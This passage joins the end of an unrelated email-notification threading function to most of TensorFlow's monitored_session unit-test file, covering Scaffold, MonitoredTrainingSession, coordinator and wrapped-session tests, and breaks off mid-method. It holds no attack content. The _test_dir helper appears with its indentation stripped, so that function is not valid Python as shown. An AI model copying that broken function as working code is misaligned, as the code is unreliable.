    does not keep the process alive at shutdown.
    """
    email_notification = get_value('config.property','SMTP','email_notification')
    if email_notification == "y" or email_notification == "Y":
        t = threading.Thread(target=send_email_notification)
        # Bug fix: the original assigned `t.deamon` (typo), which merely set an
        # unused attribute -- the thread was never actually daemonized and
        # could keep the process alive on exit.
        t.daemon = True
        t.start()
        logs.logging.info("started")
    else:
        logs.logging.info("Email notification is not enabled")
monitored_session_test.py | # pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import sys
import threading
import time
import traceback
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
def latest_summaries(base_dir):
  """Return the summary events from the newest event file in `base_dir`.

  Args:
    base_dir: Directory searched for `events.*` files.

  Returns:
    A list of events that carry a `summary` field; empty if no event file
    exists.
  """
  event_files = sorted(glob.glob(os.path.join(base_dir, 'events.*')))
  if not event_files:
    return []
  # Event file names embed a timestamp, so the lexicographically largest
  # one is the most recent.
  events = summary_io.summary_iterator(event_files[-1])
  return [event for event in events if event.HasField('summary')]
class ScaffoldTest(test.TestCase):
  """Scaffold tests."""
  def test_nothing_created_before_finalize(self):
    """A fresh Scaffold leaves every op property unset until `finalize`."""
    with ops.Graph().as_default():
      scaffold = monitored_session.Scaffold()
      self.assertEqual(None, scaffold.init_op)
      self.assertEqual(None, scaffold.init_feed_dict)
      self.assertEqual(None, scaffold.init_fn)
      self.assertEqual(None, scaffold.ready_op)
      self.assertEqual(None, scaffold.ready_for_local_init_op)
      self.assertEqual(None, scaffold.local_init_op)
      self.assertEqual(None, scaffold.saver)
  def test_defaults_empty_graph(self):
    """`finalize` fills in default init/ready/local-init ops and a saver."""
    with ops.Graph().as_default():
      scaffold = monitored_session.Scaffold()
      variables.VariableV1(1, name='my_var')
      variables.VariableV1(
          2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
      scaffold.finalize()
      self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
      self.assertEqual(None, scaffold.init_feed_dict)
      self.assertEqual(None, scaffold.init_fn)
      self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
      self.assertEqual(None, scaffold.local_init_feed_dict)
      self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
      with self.cached_session() as sess:
        # Before any init runs, both variables are reported not-ready.
        self.assertItemsEqual([b'my_var', b'my_local_var'],
                              sess.run(scaffold.ready_op))
        # The local variable does not block readiness-for-local-init.
        self.assertItemsEqual([b'my_var'],
                              sess.run(scaffold.ready_for_local_init_op))
        sess.run(scaffold.init_op)
        self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
        sess.run(scaffold.local_init_op)
        self.assertEqual(0, len(sess.run(scaffold.ready_op)))
  def test_defaults_no_variables(self):
    """Default ops are still created in a graph with no variables."""
    with ops.Graph().as_default():
      scaffold = monitored_session.Scaffold()
      constant_op.constant(1, name='my_const')
      scaffold.finalize()
      self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
      self.assertEqual(None, scaffold.init_feed_dict)
      self.assertEqual(None, scaffold.init_fn)
      self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
      self.assertEqual(None, scaffold.local_init_feed_dict)
      self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
  def test_caches_values(self):
    """Two Scaffolds finalized in the same graph share the same default ops."""
    with ops.Graph().as_default():
      variables.VariableV1([1])
      scaffold1 = monitored_session.Scaffold()
      scaffold1.finalize()
      scaffold2 = monitored_session.Scaffold()
      scaffold2.finalize()
      # The second finalize picks the ops up from graph collections rather
      # than building new ones.
      self.assertEqual(scaffold1.init_op, scaffold2.init_op)
      self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
      self.assertEqual(scaffold1.ready_for_local_init_op,
                       scaffold2.ready_for_local_init_op)
      self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
      self.assertEqual(scaffold1.saver, scaffold2.saver)
  def test_raise_error_if_more_than_one_cached_item(self):
    """An ambiguous SAVERS collection (two savers) makes finalize fail."""
    with ops.Graph().as_default():
      variables.VariableV1([1])
      ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
      ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
      with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
        monitored_session.Scaffold().finalize()
  def test_uses_passed_values(self):
    """Explicit constructor arguments survive `finalize` unchanged."""
    with ops.Graph().as_default():
      variables.VariableV1([1])
      saver = saver_lib.Saver()
      scaffold = monitored_session.Scaffold(
          init_op=2,
          init_feed_dict=3,
          init_fn=lambda scaffold, sess: 4,
          ready_op=5,
          ready_for_local_init_op=6,
          local_init_op=7,
          local_init_feed_dict=8,
          saver=saver)
      scaffold.finalize()
      self.assertEqual(2, scaffold.init_op)
      self.assertEqual(3, scaffold.init_feed_dict)
      # init_fn is re-wrapped by finalize, so only check it is callable.
      self.assertTrue(callable(scaffold.init_fn))
      self.assertEqual(5, scaffold.ready_op)
      self.assertEqual(6, scaffold.ready_for_local_init_op)
      self.assertEqual(7, scaffold.local_init_op)
      self.assertEqual(8, scaffold.local_init_feed_dict)
      self.assertEqual(saver, scaffold.saver)
  def test_graph_is_finalized(self):
    """After `finalize` the graph rejects any further op creation."""
    with ops.Graph().as_default():
      variables.VariableV1([1])
      monitored_session.Scaffold().finalize()
      with self.assertRaisesRegexp(RuntimeError,
                                   'Graph is finalized and cannot be modified'):
        constant_op.constant([0])
  def test_new_scaffold_from_default_scaffold(self):
    """Copying from a default Scaffold keeps the explicitly passed values."""
    scaffold1 = monitored_session.Scaffold()
    with ops.Graph().as_default():
      variables.VariableV1([1])
      saver = saver_lib.Saver()
      scaffold2 = monitored_session.Scaffold(
          init_op=2,
          init_feed_dict=3,
          init_fn=lambda scaffold, sess: 4,
          ready_op=5,
          ready_for_local_init_op=6,
          local_init_op=7,
          local_init_feed_dict=8,
          saver=saver,
          copy_from_scaffold=scaffold1)
      scaffold2.finalize()
      self.assertEqual(2, scaffold2.init_op)
      self.assertEqual(3, scaffold2.init_feed_dict)
      self.assertTrue(callable(scaffold2.init_fn))
      self.assertEqual(5, scaffold2.ready_op)
      self.assertEqual(6, scaffold2.ready_for_local_init_op)
      self.assertEqual(7, scaffold2.local_init_op)
      self.assertEqual(8, scaffold2.local_init_feed_dict)
      self.assertEqual(saver, scaffold2.saver)
  def test_new_scaffold_from_existing_scaffold(self):
    """New constructor arguments override values copied from a scaffold."""
    with ops.Graph().as_default():
      variables.VariableV1([1])
      saver = saver_lib.Saver()
      scaffold1 = monitored_session.Scaffold(
          init_op=2,
          init_feed_dict=3,
          init_fn=lambda scaffold, sess: 4,
          ready_op=5,
          ready_for_local_init_op=6,
          local_init_op=7,
          local_init_feed_dict=8,
          saver=saver)
      scaffold2 = monitored_session.Scaffold(
          init_op=4,
          init_feed_dict=6,
          init_fn=lambda scaffold, sess: 8,
          ready_op=10,
          ready_for_local_init_op=12,
          local_init_op=14,
          local_init_feed_dict=15,
          saver=saver,
          copy_from_scaffold=scaffold1)
      scaffold2.finalize()
      self.assertEqual(4, scaffold2.init_op)
      self.assertEqual(6, scaffold2.init_feed_dict)
      self.assertTrue(callable(scaffold2.init_fn))
      self.assertEqual(10, scaffold2.ready_op)
      self.assertEqual(12, scaffold2.ready_for_local_init_op)
      self.assertEqual(14, scaffold2.local_init_op)
      self.assertEqual(15, scaffold2.local_init_feed_dict)
      self.assertEqual(saver, scaffold2.saver)
  def test_copy_from_scaffold_is_scaffold(self):
    """`copy_from_scaffold` must be a Scaffold instance, not any object."""
    with ops.Graph().as_default():
      with self.assertRaisesRegexp(
          TypeError, 'copy_from_scaffold is not a Scaffold instance'):
        monitored_session.Scaffold(copy_from_scaffold=1)
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
  """Hook double that records how often each callback fires.

  Attributes:
    should_stop: When True, `after_run` requests a stop on its run context.
    request: Value returned by `before_run` (a `SessionRunArgs` in real use).
    call_counter: Counter keyed by callback name.
    last_run_context: Most recent `run_context` passed to `before_run`.
    last_run_values: Most recent `run_values` passed to `after_run`.
  """
  def __init__(self):
    self.call_counter = collections.Counter()
    self.should_stop = False
    self.request = None
    self.last_run_context = None
    self.last_run_values = None
  def begin(self):
    self.call_counter.update(['begin'])
  def after_create_session(self, session, coord):  # pylint: disable=unused-argument
    self.call_counter.update(['after_create_session'])
  def before_run(self, run_context):
    self.call_counter.update(['before_run'])
    self.last_run_context = run_context
    return self.request
  def after_run(self, run_context, run_values):
    self.call_counter.update(['after_run'])
    self.last_run_values = run_values
    if self.should_stop:
      run_context.request_stop()
  def end(self, session):
    self.call_counter.update(['end'])
class MonitoredTrainingSessionTest(test.TestCase):
  """Tests MonitoredTrainingSession."""
  def test_saving_restoring_checkpoint(self):
    """A chief session checkpoints on close and a restart restores it."""
    logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(2, session.run(gstep))
  def test_save_checkpoint_steps(self):
    """`save_checkpoint_steps` triggers a checkpoint at the given step count."""
    logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_steps')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_checkpoint_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(100):
          session.run(new_gstep)
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(100, session.run(gstep))
  def test_save_checkpoint_secs(self):
    """`save_checkpoint_secs` triggers a checkpoint after wall-clock time."""
    logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_secs')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_checkpoint_secs=0.1,
          log_step_count_steps=10) as session:
        session.run(new_gstep)
        # Sleep past the save interval so the timer-based hook fires on the
        # next run calls.
        time.sleep(0.2)
        for _ in range(10):
          session.run(new_gstep)
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(11, session.run(gstep))
  def test_summaries_steps(self):
    """`save_summaries_steps` writes summaries every N steps."""
    logdir = _test_dir(self.get_temp_dir(), 'test_summaries_steps')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      summary.scalar('my_summary_tag', new_gstep * 2)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_summaries_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(101):
          session.run(new_gstep)
    summaries = latest_summaries(logdir)
    tags = [s.summary.value[0].tag for s in summaries]
    self.assertIn('my_summary_tag', tags)
    self.assertIn('global_step/sec', tags)
  def test_summaries_secs(self):
    """`save_summaries_secs` writes summaries on a wall-clock interval."""
    logdir = _test_dir(self.get_temp_dir(), 'test_summaries_secs')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      summary.scalar('my_summary_tag', new_gstep * 2)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_summaries_steps=None,
          save_summaries_secs=0.1,
          log_step_count_steps=10) as session:
        session.run(new_gstep)
        # Sleep past the summary interval so the timer-based hook fires.
        time.sleep(0.2)
        for _ in range(101):
          session.run(new_gstep)
    summaries = latest_summaries(logdir)
    tags = [s.summary.value[0].tag for s in summaries]
    self.assertIn('my_summary_tag', tags)
    self.assertIn('global_step/sec', tags)
  def test_custom_saving(self):
    """With saving disabled, chief-only hooks run but nothing is checkpointed."""
    logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
    fake_hook = FakeHook()
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          chief_only_hooks=[fake_hook],
          save_checkpoint_secs=0) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
      # Check whether custom hook called or not
      self.assertEqual(1, fake_hook.call_counter['begin'])
      # A restart will not find the checkpoint, since we didn't save.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(0, session.run(gstep))
  def test_save_graph_def(self):
    """`save_graph_def=True` writes graph.pbtxt and meta graph files."""
    logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_checkpoint_steps=1,
          save_graph_def=True) as session:
        self.assertIn('graph.pbtxt', os.listdir(logdir))
        self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 1)
        session.run(new_gstep)
        self.assertLen(glob.glob(os.path.join(logdir, '*.meta')), 2)
  def test_save_graph_def_false(self):
    """`save_graph_def=False` suppresses graph.pbtxt and meta graph files."""
    logdir = _test_dir(self.get_temp_dir(), 'test_save_graph_def')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_checkpoint_steps=1,
          save_graph_def=False) as session:
        self.assertNotIn('graph.pbtxt', os.listdir(logdir))
        self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
        session.run(new_gstep)
        self.assertEmpty(glob.glob(os.path.join(logdir, '*.meta')))
class MockExtended(object):
  """Minimal stand-in for a distribution strategy's `extended` object."""

  def __init__(self, between_graph, should_init, should_checkpoint,
               should_save_summary):
    # Mirror the attribute names MonitoredTrainingSession reads off a real
    # strategy's `extended` object.
    self.should_checkpoint = should_checkpoint
    self.should_save_summary = should_save_summary
    self.experimental_between_graph = between_graph
    self.experimental_should_init = should_init
class MockStrategy(object):
  """Minimal stand-in for a distribution strategy.

  Only carries the `extended` attribute that the distribute coordinator
  inspects; all knobs are forwarded to a `MockExtended`.
  """

  def __init__(self,
               between_graph=False,
               should_init=True,
               should_checkpoint=None,
               should_save_summary=None):
    self.extended = MockExtended(between_graph, should_init,
                                 should_checkpoint, should_save_summary)
class MonitoredTrainingSessionWithDistributeCoordinatorTest(test.TestCase):
  """Test distribute coordinator controls summary saving and checkpointing."""
  def test_summary_hook_enabled(self):
    """A worker context with should_save_summary=True writes summaries."""
    context = distribute_coordinator._WorkerContext(
        MockStrategy(should_save_summary=True), None, None, None)
    logdir = _test_dir(self.get_temp_dir(), 'test_summaries_enabled')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      summary.scalar('my_summary_tag', new_gstep * 2)
      with context, monitored_session.MonitoredTrainingSession(
          checkpoint_dir=logdir,
          save_summaries_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(101):
          session.run(new_gstep)
    summaries = latest_summaries(logdir)
    tags = [s.summary.value[0].tag for s in summaries]
    self.assertIn('my_summary_tag', tags)
    self.assertIn('global_step/sec', tags)
  def test_summary_hook_disabled(self):
    """A worker context with should_save_summary=False suppresses summaries."""
    context = distribute_coordinator._WorkerContext(
        MockStrategy(should_save_summary=False), None, None, None)
    logdir = _test_dir(self.get_temp_dir(), 'test_summaries_disabled')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      summary.scalar('my_summary_tag', new_gstep * 2)
      with context, monitored_session.MonitoredTrainingSession(
          checkpoint_dir=logdir,
          save_summaries_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(101):
          session.run(new_gstep)
    # No summary is saved.
    summaries = latest_summaries(logdir)
    self.assertEqual(len(summaries), 0)
  def test_checkpoint_hook_enabled(self):
    """A worker context with should_checkpoint=True saves checkpoints."""
    context = distribute_coordinator._WorkerContext(
        MockStrategy(should_checkpoint=True), None, None, None)
    logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_enabled')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with context, monitored_session.MonitoredTrainingSession(
          checkpoint_dir=logdir,
          save_checkpoint_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(100):
          session.run(new_gstep)
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(100, session.run(gstep))
  def test_checkpoint_hook_disabled(self):
    """A worker context with should_checkpoint=False suppresses checkpoints."""
    context = distribute_coordinator._WorkerContext(
        MockStrategy(should_checkpoint=False), None, None, None)
    logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with context, monitored_session.MonitoredTrainingSession(
          checkpoint_dir=logdir,
          save_checkpoint_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(100):
          session.run(new_gstep)
    # No checkpoint is saved.
    checkpoint = checkpoint_management.latest_checkpoint(logdir)
    self.assertIsNone(checkpoint)
  def test_checkpoint_hook_enable_on_non_chief_with_collective_ops(self):
    """A non-chief worker with collective ops checkpoints to a tmp subdir."""
    strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy()
    strategy.extended._is_chief = False
    context = distribute_coordinator._WorkerContext(strategy, None, 'worker', 1)
    logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
    with ops.Graph().as_default():
      gstep = training_util.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      with context, monitored_session.MonitoredTrainingSession(
          checkpoint_dir=logdir,
          save_checkpoint_steps=100,
          log_step_count_steps=10) as session:
        for _ in range(100):
          session.run(new_gstep)
    # No checkpoint is saved.
    checkpoint = checkpoint_management.latest_checkpoint(logdir)
    self.assertIsNone(checkpoint)
    # But saved to a temporary directory.
    checkpoint = checkpoint_management.latest_checkpoint(
        os.path.join(logdir, 'tmp_worker_1'))
    self.assertIsNotNone(checkpoint)
class StopAtNSession(monitored_session._WrappedSession):
  """A wrapped session that stops at the N-th call to _check_stop."""

  def __init__(self, sess, n):
    super(StopAtNSession, self).__init__(sess)
    # Remaining number of `_check_stop` calls that report "keep going".
    self._count = n

  def _check_stop(self):
    if self._count != 0:
      self._count -= 1
      return False
    return True
class WrappedSessionTest(test.TestCase):
  """_WrappedSession tests."""

  @test_util.run_deprecated_v1
  def test_properties(self):
    """The wrapper exposes the underlying session's graph and target."""
    with self.cached_session() as sess:
      constant_op.constant(0.0)
      wrapped_sess = monitored_session._WrappedSession(sess)
      # `assertEquals` is a deprecated alias (removed in Python 3.12);
      # `assertEqual` exists in both Python 2 and 3.
      self.assertEqual(sess.graph, wrapped_sess.graph)
      self.assertEqual(sess.sess_str, wrapped_sess.sess_str)

  @test_util.run_deprecated_v1
  def test_should_stop_on_close(self):
    """Closing the wrapper flips `should_stop` to True."""
    with self.cached_session() as sess:
      wrapped_sess = monitored_session._WrappedSession(sess)
      self.assertFalse(wrapped_sess.should_stop())
      wrapped_sess.close()
      self.assertTrue(wrapped_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_should_stop_uses_check_stop(self):
    """`should_stop` delegates to the subclass's `_check_stop`."""
    with self.cached_session() as sess:
      wrapped_sess = StopAtNSession(sess, 3)
      self.assertFalse(wrapped_sess.should_stop())
      self.assertFalse(wrapped_sess.should_stop())
      self.assertFalse(wrapped_sess.should_stop())
      self.assertTrue(wrapped_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_should_stop_delegates_to_wrapped_session(self):
    """A wrapper around a wrapper consults the inner session's stop check."""
    with self.cached_session() as sess:
      wrapped_sess0 = StopAtNSession(sess, 4)
      wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertTrue(wrapped_sess1.should_stop())

  @test_util.run_deprecated_v1
  def test_close_twice(self):
    """A second `close` is a harmless no-op."""
    with self.cached_session() as sess:
      wrapped_sess = monitored_session._WrappedSession(sess)
      wrapped_sess.close()
      self.assertTrue(wrapped_sess.should_stop())
      wrapped_sess.close()
      self.assertTrue(wrapped_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_run(self):
    """`run` is forwarded, including the feed dict, to the real session."""
    with self.cached_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
      wrapped_sess = monitored_session._WrappedSession(sess)
      self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
  """Spin (with 1 ms sleeps) until `coord` requests a stop."""
  while True:
    if coord.should_stop():
      return
    time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
  """_CoordinatedSession tests."""

  @test_util.run_deprecated_v1
  def test_properties(self):
    """The coordinated wrapper exposes the session's graph and target."""
    with self.cached_session() as sess:
      constant_op.constant(0.0)
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      # `assertEquals` is a deprecated alias (removed in Python 3.12);
      # `assertEqual` exists in both Python 2 and 3.
      self.assertEqual(sess.graph, coord_sess.graph)
      self.assertEqual(sess.sess_str, coord_sess.sess_str)

  @test_util.run_deprecated_v1
  def test_run(self):
    """`run` is forwarded, including the feed dict, to the real session."""
    with self.cached_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))

  @test_util.run_deprecated_v1
  def test_should_stop_on_close(self):
    """Closing the coordinated session flips `should_stop` to True."""
    with self.cached_session() as sess:
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      coord_sess.close()
      self.assertTrue(coord_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_should_stop_on_coord_stop(self):
    """A stop requested on the coordinator propagates to the session."""
    with self.cached_session() as sess:
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      coord.request_stop()
      self.assertTrue(coord_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_dont_request_stop_on_exception_in_main_thread(self):
    """An exception raised by `run` itself does not stop the coordinator."""
    with self.cached_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      self.assertEqual(0, coord_sess.run(c))
      self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
      with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
        coord_sess.run([None], feed_dict={c: 2})
      self.assertFalse(coord.should_stop())
      self.assertFalse(coord_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_stop_threads_on_close_after_exception(self):
    """Registered threads keep running after a `run` error but die on close."""
    with self.cached_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      coord = coordinator.Coordinator()
      threads = [
          threading.Thread(
              target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
      ]
      for t in threads:
        coord.register_thread(t)
        t.start()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      for t in threads:
        self.assertTrue(t.is_alive())
      self.assertEqual(0, coord_sess.run(c))
      for t in threads:
        self.assertTrue(t.is_alive())
      self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
      for t in threads:
        self.assertTrue(t.is_alive())
      with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
        coord_sess.run([None], feed_dict={c: 2})
      # Only `close` requests the stop and joins the registered threads.
      coord_sess.close()
      for t in threads:
        self.assertFalse(t.is_alive())
      self.assertTrue(coord.should_stop())
      self.assertTrue(coord_sess.should_stop())

  def test_stop_threads_on_close(self):
    """`close` stops the coordinator and joins all registered threads."""
    with self.cached_session() as sess:
      coord = coordinator.Coordinator()
      threads = [
          threading.Thread(
              target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
      ]
      for t in threads:
        coord.register_thread(t)
        t.start()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      coord_sess.close()
      for t in threads:
        self.assertFalse(t.is_alive())
      self.assertTrue(coord.should_stop())
      self.assertTrue(coord_sess.should_stop())

  @test_util.run_deprecated_v1
  def test_propagates_exception_trace(self):
    """Errors keep the original stack trace from session.py, not the wrapper."""
    assertion = control_flow_ops.Assert(False, ['This should fail.'])
    with self.cached_session() as sess:
      coord = coordinator.Coordinator(clean_stop_exception_types=())
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      try:
        coord_sess.run([assertion])
        self.fail('No exception was raised by assertion.')
      except errors_impl.InvalidArgumentError:
        # Extract the name of the file where the exception was first raised.
        _, _, exc_traceback = sys.exc_info()
        tb = traceback.extract_tb(exc_traceback)
        exc_source_file = tb[-1][0]
        exc_source_basename = os.path.basename(exc_source_file)
        # If it's monitored_session.py then the original stack trace was not
        # correctly propagated.
        self.assertIn(
            exc_source_basename, ['session.py', 'monitored_session.py'],
            'The exception was raised from an unrecognized file. This unit '
            'test probably needs to be updated. Traceback:\n%s\n' % tb)
        self.assertEqual(
            exc_source_basename, 'session.py',
            'Original stack trace was not propagated by MonitoredSession. '
            'Traceback:\n%s' % tb)
class AbortAtNSession(object):
  """A mock session that aborts at the N-th run call."""

  def __init__(self, sess, n):
    self._sess = sess
    # Number of successful `run` calls left before aborting.
    self._count = n

  def close(self):
    # Nothing to release for the mock.
    pass

  def run(self, *args, **kwargs):
    remaining = self._count
    if remaining == 0:
      raise errors_impl.AbortedError('Aborted at N', None, None)
    self._count = remaining - 1
    return self._sess.run(*args, **kwargs)
class StopCoordinatorWithException(session_run_hook.SessionRunHook):
  """With this hook Coordinator throws an exception after N-runs."""
  def __init__(self, calls_before_stopping, exception_to_raise=None):
    # Prevents spawning a second side thread when `after_create_session`
    # fires again after a session re-creation.
    self._started_the_side_thread_already = False
    # Protects `_calls_before_stopping`, which is read on the side thread
    # and decremented on the main thread in `after_run`.
    self._lock = threading.Lock()
    # Set by the side thread once the exception has been handed to the
    # coordinator; `after_run` waits on it to make the stop observable.
    self._stored_exception_event = threading.Event()
    self._calls_before_stopping = calls_before_stopping
    self._exception_to_raise = (exception_to_raise or errors_impl.AbortedError(
        None, None, 'Aborted at N'))
  def _maybe_stop_with_exception(self, coord):
    # Side-thread body: spin until the run counter reaches zero, then raise
    # the configured exception and store it in the coordinator.
    while True:
      with self._lock:
